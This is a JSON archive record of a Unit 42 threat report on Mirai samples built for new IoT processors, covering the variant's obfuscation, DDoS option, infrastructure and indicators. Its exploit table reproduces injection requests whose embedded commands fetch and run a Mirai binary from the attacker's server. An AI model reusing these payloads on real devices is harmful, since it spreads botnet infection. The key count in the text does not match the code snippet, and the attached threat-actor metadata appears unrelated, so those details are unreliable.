{
	"id": "5ac56eec-f249-46d5-ac71-a5f1548ca8e1",
	"created_at": "2026-04-06T00:21:32.051789Z",
	"updated_at": "2026-04-10T13:11:22.870505Z",
	"deleted_at": null,
	"sha1_hash": "f47336ebb25980cd3d36973a0c25d3d408fff476",
	"title": "Mirai Compiled for New Processors Surfaces in the Wild",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 574814,
	"plain_text": "Mirai Compiled for New Processors Surfaces in the Wild\r\nBy Ruchna Nigam\r\nPublished: 2019-04-08 · Archived: 2026-04-05 16:14:12 UTC\r\nExecutive Summary\r\nIn late February 2019, Unit 42 discovered Mirai samples compiled for new processors/architectures not previously\r\nseen. Despite the source code being publicly released in October of 2016, the malware has, until now, only\r\nbeen found targeting a fixed set of processors/architectures.\r\nUnit 42 has found the newly discovered samples are compiled for Altera Nios II, OpenRISC, Tensilica Xtensa,\r\nand Xilinx MicroBlaze processors. This is not the first time Mirai has been expanded for new processor\r\narchitectures; samples targeting ARC CPUs were discovered in January 2018. Yet this development shows that\r\nMirai developers continue to actively innovate, targeting a growing array of IoT devices. The malware gained\r\nnotoriety in 2016 for its use in massive denial of service attacks on Dyn and the website of security blogger Brian\r\nKrebs. If the latest innovations lead to an increase in the number of infected devices, that means that Mirai\r\nattackers would have access to additional firepower for use in denial of service attacks.\r\nIn this blog, we show the new features we’ve found in these new samples, discuss the infrastructure we observed,\r\nshow how other Mirai samples using known exploits were hosted on the same infrastructure as the new samples,\r\nand give indicators of compromise (IoCs) for these new samples.\r\nTo protect against Mirai and other threats, organizations should make securing their IoT devices with the latest\r\nupdates and non-default passwords a priority.\r\nNew Features in these New Samples\r\nIn addition to being compiled for these new architectures, we have found that these new samples also contain\r\nthe following new features:\r\nEncryption algorithm: These samples make use of a modified version of the standard byte-wise XOR (as\r\nimplemented in the toggle_obf function) used in the original Mirai source code.\r\nIt uses 11 8-byte keys, all of which are cumulatively byte-wise XOR-ed to get the final resulting key. This is better\r\nillustrated in the code snippet below:\r\ntablekeys = [0xdeadbeef, 0x85DAB8BF, 0xDEEDEEBF, 0xDEABBEAF, 0xDBBD45BF, 0x246584EF,\r\n             0x85BFE8BF, 0xD68395BF, 0xDBAAAAAF, 0x0DAABEEF]\r\nxor_key = 0\r\nfor key in tablekeys:\r\n    # fold every byte of the key into the running single-byte XOR key\r\n    xor_key ^= (key \u0026 0xff) ^ (key \u003e\u003e 8 \u0026 0xff) ^ (key \u003e\u003e 16 \u0026 0xff) ^ (key \u003e\u003e 24 \u0026 0xff)\r\nThis is effectively equivalent to a byte-wise XOR with 0x5A.\r\nattack_method_ovh: The samples include a DDoS attack option with the following parameters:\r\nATK_OPT_IP_TOS = 0\r\nATK_OPT_IP_IDENT = 0xFFFF\r\nATK_OPT_IP_TTL = 64\r\nATK_OPT_IP_DF = 1\r\nATK_OPT_SPORT = 0xFFFF\r\nATK_OPT_DPORT = 0xFFFF\r\nATK_OPT_SEQRND = 0xFFFF\r\nATK_OPT_ACKRND = 0\r\nATK_OPT_URG = 0\r\nATK_OPT_ACK = 0\r\nATK_OPT_PSH = 0\r\nATK_OPT_RST = 0\r\nATK_OPT_SYN = 1\r\nATK_OPT_FIN = 0\r\nATK_OPT_SOURCE = LOCAL_ADDR\r\nThese are the exact same parameters as the attack method “TCP SYN” (attack_method_tcpsyn) in the original\r\nMirai source, so the reason behind incorporating a new attack method with the same parameters remains unclear.\r\nPivoting on this attack method in AutoFocus, we found samples circulating in the wild since November 2018 for\r\nother previously known architectures also employing it.\r\nInfrastructure\r\nWe found these latest samples on a single IP that at one point in time was hosting them via an open directory;\r\nhowever, on February 22, 2019, the server was updated to hide the file listing but continued to host the files\r\nthemselves.\r\nFigure 1. Open directory hosting samples of the Mirai variant\r\nPrior to the update on February 22, the same IP was hosting Mirai samples containing the following exploits\r\nknown to be used in previous versions of Mirai. The presence of these exploits in both previous versions of Mirai\r\nand our newly discovered samples helps show a tie between the two, which are likely used by the same attacker in this\r\ncase. These exploits are shown in Table 1, below.\r\nVulnerability | Exploit Format\r\nThinkPHP Remote Code Execution\r\nGET /to/thinkphp5.1.29/?s=index/\r\nhinkContainer/invokefunction\u0026function=call_user_func_array\u0026vars[0]=system\u0026vars[1][]=\r\n'wget http://178.62.227[.]13/wrgjwrgjwrg246356356356/hx86 -O /tmp/Hito; chmod 777\r\n/tmp/Hito; /tmp/Hito wget.exploit.selfrep.thinkphp' HTTP/1.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nUser-Agent: Hito/2.0\r\nD-Link DSL2750B OS Command Injection\r\nNetgear Remote Code Execution\r\nGET /setup.cgi?next_file=netgear.cfg\u0026todo=syscmd\u0026cmd=rm+-\r\nrf+/tmp/*;/bin/busybox+wget+-g+178.62.227[.]13+-l+/tmp/binary+-\r\nr+/wrgjwrgjwrg246356356356/hmips;+/bin/busybox+chmod\r\n777+*+/tmp/binary;/tmp/binary+wget.selfrep.exploit.netgear\u0026curpath=/\u0026currentsetting.htm=1\r\nHTTP/1.0\r\nCVE-2014-8361\r\nCVE-2017-17215\r\nPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nContent-Length: 430\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\",\r\nnonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\",\r\nresponse=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\",\r\nnc=00000001, cnonce=\"248d1a2560100669\"\r\n\u003c?xml version=\"1.0\" ?\u003e\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\ns:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:Upgrade\r\nxmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"\u003e\r\n\u003cNewStatusURL\u003e$(/bin/busybox wget -g 178.62.227.13 -l /tmp/binary -r\r\n/wrgjwrgjwrg246356356356/hmips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary\r\nwget.selfrep.exploit.huawei)\u003c/NewStatusURL\u003e\u003cNewDownloadURL\u003e$(echo HUAWEIUPNP)\r\n\u003c/NewDownloadURL\u003e\u003c/u:Upgrade\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\r\nTable 1. Exploits in Mirai variant hosted at 178.62.227[.]13 prior to February 22\r\nConclusion\r\nGiven that the Mirai source code is open source, something as elementary as compiling the same source code for a\r\nlarger range of processors provides attackers with the advantage of a larger attack surface. Practically, this means\r\nthat the family can now infect and propagate via a larger number of embedded devices, affording attackers greater\r\nDDoS firepower.\r\nPalo Alto Networks customers are protected by:\r\nWildFire detects all related samples with malicious verdicts.\r\nAll exploits and IPs/URLs involved in these campaigns are blocked through Threat Prevention and\r\nPANDB.\r\nAutoFocus customers can track the exploits mentioned using the following tags:\r\nThinkPHP RCE\r\nDLinkDSL2750BOSCmdInjection\r\nNetgear RCE\r\nCVE-2014-8361\r\nCVE-2017-17215\r\nThe malware family can be tracked in AutoFocus using the tag ELFMirai\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report\r\nwith our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections\r\nto their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat\r\nAlliance, visit www.cyberthreatalliance.org.\r\nIndicators of Compromise\r\nURLs\r\n178[.]62.227.13/wrgjwrgjwrg246356356356/hmicroblazebe\r\n178[.]62.227.13/wrgjwrgjwrg246356356356/hmicroblazeel\r\n178[.]62.227.13/wrgjwrgjwrg246356356356/hnios2\r\n178[.]62.227.13/wrgjwrgjwrg246356356356/hopenrisc\r\n178[.]62.227.13/wrgjwrgjwrg246356356356/hxtensa\r\nXilinx MicroBlaze Samples\r\nOpenRISC Samples\r\nTensilica Xtensa Samples\r\nAltera Nios II Samples\r\nSource: https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/"
	],
	"report_names": [
		"mirai-compiled-for-new-processor-surfaces"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434892,
	"ts_updated_at": 1775826682,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f47336ebb25980cd3d36973a0c25d3d408fff476.pdf",
		"text": "https://archive.orkl.eu/f47336ebb25980cd3d36973a0c25d3d408fff476.txt",
		"img": "https://archive.orkl.eu/f47336ebb25980cd3d36973a0c25d3d408fff476.jpg"
	}
}